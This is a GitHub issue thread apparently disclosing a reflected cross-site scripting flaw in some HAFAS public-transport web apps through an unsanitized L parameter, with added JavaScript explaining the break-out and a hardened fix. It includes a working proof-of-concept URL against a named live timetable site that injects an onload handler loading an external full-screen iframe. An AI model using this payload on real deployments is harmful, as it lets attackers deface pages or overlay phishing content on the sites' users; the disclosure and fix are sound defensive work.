public-transport / hafas-client

JavaScript client for HAFAS public transport APIs.
ISC License

XSS vulnerability in some HAFAS instances #294

Open simonkoeck opened 1 year ago

simonkoeck commented 1 year ago

There is a cross-site scripting (XSS) security vulnerability in the HAFAS client.

For example this link: https://fahrplan.vmobil.at/webapp/index.html?L=vs_vvv%2Fjs%2Fhafas_webapp_config.js%3Fv%3D1613454502135%22%20onload%3D%22var%20e%3D%20document.createElement%28%27iframe%27%29%3Be.src%3D%27https%3A%2F%2Ftrollface.dk%27%3Be.style.cssText%20%3D%20%27position%3Aabsolute%3Bwidth%3A100%25%3Bheight%3A100%25%3Bz-index%3A100%3Bbackground%3A%23000%27%3Bdocument.body.appendChild%28e%29%3B%22

which results in the following HTML:

https://cdn.koeck.dev/276d8e.png

The vulnerable parameter is the L parameter, which sets the customer. The parameter is not sanitized.

I've found the vulnerability in several web apps which use the HAFAS client, but I'm not sure whether the vulnerability is a bug in hafas-client or in the implementation of HAFAS. I just wanted to report the vulnerability here because my phone call was left unanswered :D
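The mechanism behind the report above, as an added example that is not code from hafas-client, HaCon or the reporter: the payload in the proof-of-concept URL ends the `src` attribute with a `"` and appends an `onload="..."` handler, which only works if the page interpolates `L` unescaped into a `<script src="...">` tag. The template string, the function names and the allowlist below are my assumptions about that page, chosen to reproduce the structure the payload implies; the decoded `L` value comes straight from the URL in the report.

```javascript
// Added example, not hafas-client code. Demonstrates why an unsanitized
// "L" query parameter is an attribute-injection XSS, and one way to close it.

// Proof-of-concept URL exactly as posted in the issue above.
const REPORTED_URL =
  "https://fahrplan.vmobil.at/webapp/index.html?L=vs_vvv%2Fjs%2Fhafas_webapp_config.js%3Fv%3D1613454502135%22%20onload%3D%22var%20e%3D%20document.createElement%28%27iframe%27%29%3Be.src%3D%27https%3A%2F%2Ftrollface.dk%27%3Be.style.cssText%20%3D%20%27position%3Aabsolute%3Bwidth%3A100%25%3Bheight%3A100%25%3Bz-index%3A100%3Bbackground%3A%23000%27%3Bdocument.body.appendChild%28e%29%3B%22";

// A benign value of the same parameter (constructed from the prefix of the payload).
const BENIGN_L = "vs_vvv/js/hafas_webapp_config.js?v=1613454502135";

// Pull the percent-decoded "L" value out of a URL, as the web app would.
function extractL(url) {
  return new URL(url).searchParams.get("L");
}

// ASSUMED reconstruction of the vulnerable template: "L" is dropped into a
// script tag's src attribute with no encoding, so a '"' in the value ends the
// attribute and everything after it becomes new attributes on the tag.
function renderNaive(l) {
  return `<script src="${l}"></script>`;
}

// Hardened variant, step 1: "L" is supposed to be a relative config-file path
// with an optional cache-busting "?v=<digits>", so reject anything else.
// The allowlist regex is my choice, not something the deployment documents.
function isSafeConfigPath(l) {
  if (typeof l !== "string") return false;
  if (l.startsWith("/") || l.includes("..")) return false; // no absolute/protocol-relative paths, no traversal
  return /^[A-Za-z0-9_\-\/.]+(?:\?v=\d+)?$/.test(l);
}

// Hardened variant, step 2: even an allowlisted value is attribute-encoded
// before interpolation, so a future relaxation of the allowlist cannot
// reintroduce the break-out.
function escapeAttr(s) {
  return s
    .replace(/&/g, "&amp;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;");
}

// Returns the script tag for an acceptable "L", or null when the value must be refused.
function renderHardened(l) {
  if (!isSafeConfigPath(l)) return null;
  return `<script src="${escapeAttr(l)}"></script>`;
}

// Stand-alone demonstration.
const payload = extractL(REPORTED_URL);
console.log("decoded L parameter:\n" + payload);
console.log("\nnaive render (attacker controls an onload handler):\n" + renderNaive(payload));
console.log("\nhardened render of payload:", renderHardened(payload));
console.log("hardened render of benign value:", renderHardened(BENIGN_L));
```

The allowlist is the real fix here: `L` names a customer config file, so there is no legitimate reason for it to contain quotes, spaces or anything outside a path character set; the attribute encoding is defence in depth for the case where the value must be rendered anyway.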

derhuerst commented 1 year ago

Indeed, this is an XSS vulnerability in their HAFAS-based sites, not in hafas-client.

I've tried to get in touch with HaCon about this by just calling their contact phone number. They told me it's none of their business since I'm not a business partner of them. 🤡

Will get in touch with @zerforschung later or tomorrow. Maybe they're interested in dealing with this.

derhuerst commented 4 months ago

Just for the record: This issue still exists in >=1 HAFAS deployments. 🤡

simonkoeck commented 4 months ago

> Just for the record: This issue still exists in >=1 HAFAS deployments. 🤡

yes 🤪

derhuerst commented 1 day ago

Just for the record: This issue still exists in >=1 HAFAS deployments. 🤡🤡